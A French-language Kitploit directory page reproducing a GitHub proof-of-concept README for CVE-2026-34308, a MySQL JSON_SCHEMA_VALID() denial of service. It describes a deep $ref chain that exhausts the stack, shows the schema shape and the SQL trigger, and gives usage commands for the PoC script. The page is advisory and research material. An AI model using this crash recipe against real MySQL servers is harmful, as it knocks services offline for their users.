Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-34308 — Preuve de concept pour CVE-2026-34308, une vulnérabilité de déni de service du composant JSON de MySQL Server. Démontre l'épuisement de la pile via des chaînes $ref profondes dans JSON_SCHEMA_VALID(), provoquant un crash du serveur. Inclut un script PoC en Python et une analyse technique. | Kitploit
Outils/GitHubGitHub/joakimbulow/cve-2026-34308
Analyse des VulnérabilitésExploitationTests d'IntrusionSécurité des Bases de Données
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Preuve de concept pour CVE-2026-34308, une vulnérabilité de déni de service du composant JSON de MySQL Server. Démontre l'épuisement de la pile via des chaînes $ref profondes dans JSON_SCHEMA_VALID(), provoquant un crash du serveur. Inclut un script PoC en Python et une analyse technique.

Partager

CVE-2026-34308 : MySQL Server (composant JSON) déni de service

Bulletin officiel du fournisseur : Oracle Critical Patch Update Advisory — April 2026.

Résumé (d'après la CVE publiée)

Vulnérabilité dans Oracle MySQL Server (composant : Server : JSON).

Versions concernées prises en charge : 8.0.0–8.0.45, 8.4.0–8.4.8 et 9.0.0–9.6.0.

La vulnérabilité permet à un utilisateur à faibles privilèges de faire planter le serveur MySQL.

Score de base CVSS 3.1 : 6.5 (impact sur la disponibilité uniquement)
Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


Analyse technique complémentaire (ne fait pas partie du texte de la CVE)

Mécanisme observé : Récursion profonde lorsque MySQL évalue JSON_SCHEMA_VALID() sur un schéma JSON contenant une longue chaîne linéaire de pointeurs $ref, sans limite de profondeur effective lors de la compilation/validation du schéma — entraînant un épuisement de la pile et un blocage ou un plantage reproductible.

Chaîne d'appel (conceptuelle) :

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → validation interne du schéma JSON → résolution répétée de $ref
  → épuisement de la pile → blocage / plantage

Privilèges requis

Pour cette preuve de concept, n'importe quel compte MySQL authentifié suffit : accordez uniquement USAGE sur *.* (le privilège minimal de MySQL — capacité à se connecter — sans SELECT, accès aux tables ou rôles d'administration). Si l'utilisateur peut ouvrir une session et exécuter SELECT JSON_SCHEMA_VALID(...), il peut déclencher la condition.


Preuve de concept

Script PoC : poc_schema_dos.py

Construit un schéma JSON avec une chaîne linéaire de $ref (exemple de profondeur 1200) :

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

Envoyé à MySQL sous la forme : SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

Lors des tests sur des versions vulnérables, il a été observé que cela faisait planter le serveur en environ une seconde (le délai exact dépend du matériel, des options de compilation et de la profondeur du schéma).

Utilisation

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

Pour tester un compte à faibles privilèges :

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

Puis : python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (vecteur officiel)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N : Accessible depuis le réseau
  • AC:L : Complexité d'attaque faible
  • PR:L : Faibles privilèges requis
  • UI:N : Aucune interaction utilisateur
  • S:U : Périmètre inchangé
  • C:N / I:N : Aucun impact sur la confidentialité ou l'intégrité
  • A:H : Impact élevé sur la disponibilité (blocage / plantage reproductible / déni de service)

Fichiers

  • poc_schema_dos.py : Script de preuve de concept
  • README.md : Ce fichier
Télécharger l’outil